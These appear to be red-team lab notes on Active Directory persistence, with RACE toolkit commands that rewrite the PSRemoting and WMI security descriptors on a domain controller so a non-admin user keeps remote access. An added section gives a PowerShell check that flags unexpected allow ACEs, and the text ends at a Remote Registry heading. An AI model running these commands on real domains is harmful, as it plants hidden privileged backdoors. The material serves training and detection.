It is possible to modify the security descriptors (SD: owner, primary group, DACL, SACL) of multiple remote access methods (securable objects) to allow access to non-admin users.
Admin privileges are required to modify an SD.
ACLs can be modified to allow non-admin users to access securable objects.
PowerShell Remoting:
Use the RACE toolkit, with either PSRemoting or WMI.
Using PSRemoting
    # Run InviShell
    # First, import the RACE toolkit:
    . C:\AD\Tools\RACE-master\RACE.ps1

    # On local machine for student1, open elevated cmd:
    # This reads the existing ACL for root namespace and DCOM and adds an entry for our SID.
    Set-RemotePSRemoting -SamAccountName student1 -Verbose

    # On remote machine for student1 without credentials:
    Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose

    # Connect to dcorp-dc as student
    Enter-PSSession -ComputerName dcorp-dc

    # To remove the permissions on remote machine:
    Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
Using WMI
    Set-RemoteWMI -SamAccountName student1 -Verbose

    # On remote machine for student1 without credentials:
    Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

    # On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
    Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

    # On remote machine remove permissions:
    Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

    # Now we can run WMI queries on DC as student.
    gwmi -class win32_operatingsystem -ComputerName dcorp-dc
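To check a host for this kind of change, the following added example (not part of the original notes or of the RACE toolkit) lists allow ACEs whose trustee is outside an expected baseline. The function name Get-UnexpectedAllowAce, the baseline SID list and the sample SDDL are assumptions constructed for illustration.

```powershell
# Added example: flag allow ACEs for trustees outside an expected baseline.
# The baseline is an assumption about a default install; adjust it to yours.
$ExpectedSids = @(
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-32-580',  # BUILTIN\Remote Management Users
    'S-1-5-4',       # NT AUTHORITY\INTERACTIVE
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users (WMI namespaces)
    'S-1-5-19',      # LOCAL SERVICE (WMI namespaces)
    'S-1-5-20'       # NETWORK SERVICE (WMI namespaces)
)

function Get-UnexpectedAllowAce {
    param(
        [Parameter(Mandatory)][string]$Sddl,
        [string[]]$Expected = $ExpectedSids
    )
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs grant access; deny ACEs are skipped.
        if ($ace -is [System.Security.AccessControl.CommonAce] -and
            $ace.AceQualifier -eq 'AccessAllowed' -and
            $ace.SecurityIdentifier.Value -notin $Expected) {
            [pscustomobject]@{
                Sid        = $ace.SecurityIdentifier.Value
                AccessMask = '0x{0:X8}' -f $ace.AccessMask
            }
        }
    }
}

# Constructed sample: a default-style session configuration SDDL with one
# extra allow ACE for a constructed domain-user SID.
$sample = 'O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;RM)(A;;GA;;;IU)' +
          '(A;;GA;;;S-1-5-21-1111111111-2222222222-3333333333-1105)'
Get-UnexpectedAllowAce -Sddl $sample   # reports only the constructed user SID

# Live checks (run elevated on the host being audited):
# Get-PSSessionConfiguration | ForEach-Object {
#     Get-UnexpectedAllowAce -Sddl $_.SecurityDescriptorSddl }
#
# $bin  = (Invoke-WmiMethod -Namespace 'root\cimv2' -Path '__SystemSecurity=@' -Name GetSD).SD
# $sddl = (New-Object System.Security.AccessControl.RawSecurityDescriptor($bin, 0)).GetSddlForm('All')
# Get-UnexpectedAllowAce -Sddl $sddl
```

Any SID reported for a session configuration or WMI namespace that is not in your baseline should be resolved to an account and reviewed.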
Remote Registry:
Using RACE or DAMP, with admin privs on remote machine (Make sure to run this first) -: